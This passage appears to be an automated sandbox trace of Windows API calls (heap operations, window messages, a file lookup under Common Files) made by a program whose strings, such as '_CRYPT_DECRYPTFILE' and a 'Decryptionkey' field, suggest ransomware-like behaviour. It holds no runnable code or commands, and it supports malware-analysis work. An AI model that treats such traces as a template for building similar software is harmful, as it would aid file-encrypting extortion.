(hdc=0x2a0101eb, color=0xf0f0f0) returned 0xf0f0f0 [0269.227] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.227] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.227] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 [0269.227] NtdllDialogWndProc_W () returned 0x0 [0269.227] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.227] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.227] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 [0269.227] NtdllDialogWndProc_W () returned 0x0 [0269.241] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0269.241] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f90c) returned 0 [0269.241] TranslateMessage (lpMsg=0x75f90c) returned 0 [0269.241] DispatchMessageW (lpMsg=0x75f90c) returned 0x0 [0269.241] GetForegroundWindow () returned 0xa0170 [0269.241] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.241] GetCursorPos (in: lpPoint=0x75f748 | out: lpPoint=0x75f748*(x=883, y=506)) returned 1 [0269.241] ScreenToClient (in: hWnd=0xa0170, lpPoint=0x75f748 | out: lpPoint=0x75f748) returned 1 [0269.241] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x24) returned 0xdabbb0 [0269.241] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9aff0 [0269.241] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff30 [0269.241] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe10 [0269.241] GetAsyncKeyState (vKey=1) returned 1 [0269.241] GetAsyncKeyState (vKey=2) returned 0 [0269.241] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0269.242] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe40 [0269.242] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xdfdeb8 [0269.242] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0269.242] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfdeb8 | out: hHeap=0xb80000) returned 1 [0269.242] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0269.242] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf7d8 [0269.242] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1) returned 0xdffe40 [0269.242] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf968 [0269.243] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98e60 [0269.243] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff00 [0269.243] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ec0 [0269.243] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe00 [0269.243] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde3118 [0269.243] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0269.243] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffdf0 [0269.243] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xdfdeb8 [0269.243] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0269.243] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0269.243] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x80) returned 0xbe7160 [0269.244] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfdeb8 | out: hHeap=0xb80000) returned 1 [0269.244] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0269.244] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0269.244] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0269.244] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde3118 | out: hHeap=0xb80000) returned 1 [0269.244] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe00 | out: hHeap=0xb80000) returned 1 [0269.244] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0269.244] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1) returned 0xdfff00 [0269.244] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0269.244] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe00 [0269.244] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0269.244] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffde0 [0269.244] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde3118 [0269.244] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b458 [0269.244] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffdd0 [0269.244] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xdfdeb8 [0269.244] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b458 | out: hHeap=0xb80000) returned 1 [0269.244] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b458 [0269.244] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x80) returned 0xbe71e8 [0269.244] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfdeb8 | out: hHeap=0xb80000) returned 1 [0269.244] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b458 | out: hHeap=0xb80000) returned 1 [0269.244] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde3118 | out: hHeap=0xb80000) returned 1 [0269.245] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffde0 | out: hHeap=0xb80000) returned 1 [0269.245] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe00 | out: hHeap=0xb80000) returned 1 [0269.245] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1) returned 0xdffe00 [0269.245] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b458 [0269.245] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffde0 [0269.245] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf698 [0269.245] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d10 [0269.245] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffdc0 [0269.245] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffdc0 | out: hHeap=0xb80000) returned 1 [0269.245] SendMessageW (hWnd=0x6015e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xd [0269.245] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1c) returned 0xddfaf8 [0269.245] GetWindowTextW (in: hWnd=0x6015e, lpString=0xddfaf8, nMaxCount=14 | out: lpString="Decryptionkey") returned 13 [0269.245] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98da0 [0269.245] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfb48 [0269.245] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffdc0 [0269.245] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfaf8 | out: hHeap=0xb80000) returned 1 [0269.245] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d10 | out: hHeap=0xb80000) returned 1 [0269.245] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf698 | out: hHeap=0xb80000) returned 1 [0269.245] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffde0 | out: hHeap=0xb80000) returned 1 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1) returned 0xdffde0 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d10 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffdb0 [0269.246] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffdb0 | out: hHeap=0xb80000) returned 1 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9b218 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf698 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b320 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffdb0 [0269.246] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b320 | out: hHeap=0xb80000) returned 1 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfaf8 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b320 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b3f8 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfb70 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98c80 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffda0 [0269.246] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98c80 | out: hHeap=0xb80000) returned 1 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xdfdeb8 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98c80 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98cb0 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfb98 [0269.246] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b3c8 [0269.247] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffd90 [0269.247] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b3c8 | out: hHeap=0xb80000) returned 1 [0269.247] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfbc0 [0269.247] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b3c8 [0269.247] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b0f8 [0269.247] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfbe8 [0269.247] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98bc0 [0269.247] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffd80 [0269.247] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b350 [0269.247] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda4110 [0269.247] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 1 [0269.247] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f6b4) returned 0 [0269.247] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f6b4) returned 1 [0269.247] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0269.247] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfc10 [0269.248] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b008 [0269.248] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffd70 [0269.248] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b008 | out: hHeap=0xb80000) returned 1 [0269.248] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfc38 [0269.248] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b008 [0269.248] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b308 [0269.248] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffd60 [0269.248] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b308 | out: hHeap=0xb80000) returned 1 [0269.248] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffd60 | out: hHeap=0xb80000) returned 1 [0269.248] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfc60 [0269.248] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b308 [0269.248] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffd60 [0269.248] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b128 [0269.248] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b410 [0269.248] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffd50 [0269.248] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b410 | out: hHeap=0xb80000) returned 1 [0269.248] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffd50 | out: hHeap=0xb80000) returned 1 [0269.248] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfc88 [0269.249] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b410 [0269.249] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffd50 [0269.249] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b410 | out: hHeap=0xb80000) returned 1 [0269.249] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfcb0 [0269.249] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b410 [0269.249] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b140 [0269.249] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffd40 [0269.249] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b140 | out: hHeap=0xb80000) returned 1 [0269.249] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffd40 | out: hHeap=0xb80000) returned 1 [0269.249] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfcd8 [0269.249] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b140 [0269.249] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffd40 [0269.249] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ef0 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98dd0 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffd30 [0269.250] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98dd0 | out: hHeap=0xb80000) returned 1 [0269.250] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffd30 | out: hHeap=0xb80000) returned 1 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfd00 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98dd0 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffd30 [0269.250] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98dd0 | out: hHeap=0xb80000) returned 1 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfd28 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98dd0 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b2f0 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffd20 [0269.250] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b2f0 | out: hHeap=0xb80000) returned 1 [0269.250] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffd20 | out: hHeap=0xb80000) returned 1 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfd50 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b2f0 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffd20 [0269.250] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b2f0 | out: hHeap=0xb80000) returned 1 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfd78 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b2f0 [0269.250] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b230 [0269.251] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffd10 [0269.251] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b230 | out: hHeap=0xb80000) returned 1 [0269.251] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfda0 [0269.251] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b230 [0269.251] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffd00 [0269.251] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b170 [0269.251] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffd00 | out: hHeap=0xb80000) returned 1 [0269.251] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x75f100 | out: lpFindFileData=0x75f100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33446080, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x33446080, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x3346c1e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x75f144, dwReserved1=0xb875d8, cFileName="26207383702620738370", cAlternateFileName="262073~1")) returned 0xe17a60 [0269.252] FindClose (in: hFindFile=0xe17a60 | out: hFindFile=0xe17a60) returned 1 [0269.252] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b170 | out: hHeap=0xb80000) returned 1 [0269.252] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b230 | out: hHeap=0xb80000) returned 1 [0269.252] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfda0 | out: hHeap=0xb80000) returned 1 [0269.252] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffd10 | out: hHeap=0xb80000) returned 1 [0269.252] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfda0 [0269.252] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b230 [0269.252] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffd10 [0269.252] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b170 [0269.252] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98c20 [0269.252] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffd00 [0269.252] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98c20 | out: hHeap=0xb80000) returned 1 [0269.252] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffd00 | out: hHeap=0xb80000) returned 1 [0269.252] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfdc8 [0269.252] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98c20 [0269.253] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffd00 [0269.253] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98e00 [0269.253] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d40 [0269.253] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcf0 [0269.253] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d40 | out: hHeap=0xb80000) returned 1 [0269.253] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcf0 | out: hHeap=0xb80000) returned 1 [0269.253] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0269.253] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffcf0 [0269.253] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfdf0 [0269.253] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0269.253] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfdf0 | out: hHeap=0xb80000) returned 1 [0269.253] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcf0 | out: hHeap=0xb80000) returned 1 [0269.253] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd98d40 [0269.253] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda4158 [0269.253] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0269.253] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcf0 [0269.253] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffce0 [0269.253] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xe19ca8 [0269.253] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.253] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe19ca8 | out: hHeap=0xb80000) returned 1 [0269.253] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffce0 | out: hHeap=0xb80000) returned 1 [0269.253] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9b080 [0269.254] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda41a0 [0269.254] PeekMessageW (in: lpMsg=0x75f03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f03c) returned 0 [0269.254] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffce0 [0269.254] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcd0 [0269.254] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcd0 | out: hHeap=0xb80000) returned 1 [0269.254] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98b30 [0269.254] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b038 [0269.254] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b050 [0269.254] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffcd0 [0269.254] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98b00 [0269.254] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffce0 | out: hHeap=0xb80000) returned 1 [0269.254] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98aa0 [0269.254] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98b00 | out: hHeap=0xb80000) returned 1 [0269.254] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98b00 [0269.254] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98aa0 | out: hHeap=0xb80000) returned 1 [0269.254] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda41a0 | out: hHeap=0xb80000) returned 1 [0269.254] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b080 | out: hHeap=0xb80000) returned 1 [0269.254] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffce0 [0269.255] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde3118 [0269.255] GetLastError () returned 0x0 [0269.255] SetLastError (dwErrCode=0x0) [0269.255] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98b00 | out: hHeap=0xb80000) returned 1 [0269.255] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde3118 | out: hHeap=0xb80000) returned 1 [0269.255] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffce0 | out: hHeap=0xb80000) returned 1 [0269.255] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcf0 | out: hHeap=0xb80000) returned 1 [0269.255] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a60 [0269.255] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0269.255] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfdf0 [0269.255] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98b00 [0269.255] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffcf0 [0269.255] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98b00 | out: hHeap=0xb80000) returned 1 [0269.255] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfe18 [0269.255] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98b00 [0269.255] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b080 [0269.255] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffce0 [0269.255] HeapFree (in: hHeap=0xb80000, 